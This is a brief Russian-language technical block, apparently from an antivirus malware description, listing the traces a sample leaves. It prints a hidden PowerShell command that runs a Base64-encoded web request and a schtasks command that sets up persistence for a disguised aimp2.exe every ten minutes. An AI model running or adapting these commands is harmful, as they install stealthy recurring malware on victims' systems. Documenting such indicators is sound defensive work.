Техническая информация
- <SYSTEM32>\tasks\aimp2
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -WindowStyle Hidden -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSBodHRwO...
- '<SYSTEM32>\schtasks.exe' /Create /SC MINUTE /MO 10 /TN aimp2 /TR %LOCALAPPDATA%\Microsoft\Windows\Ringtones\aimp2.exe /f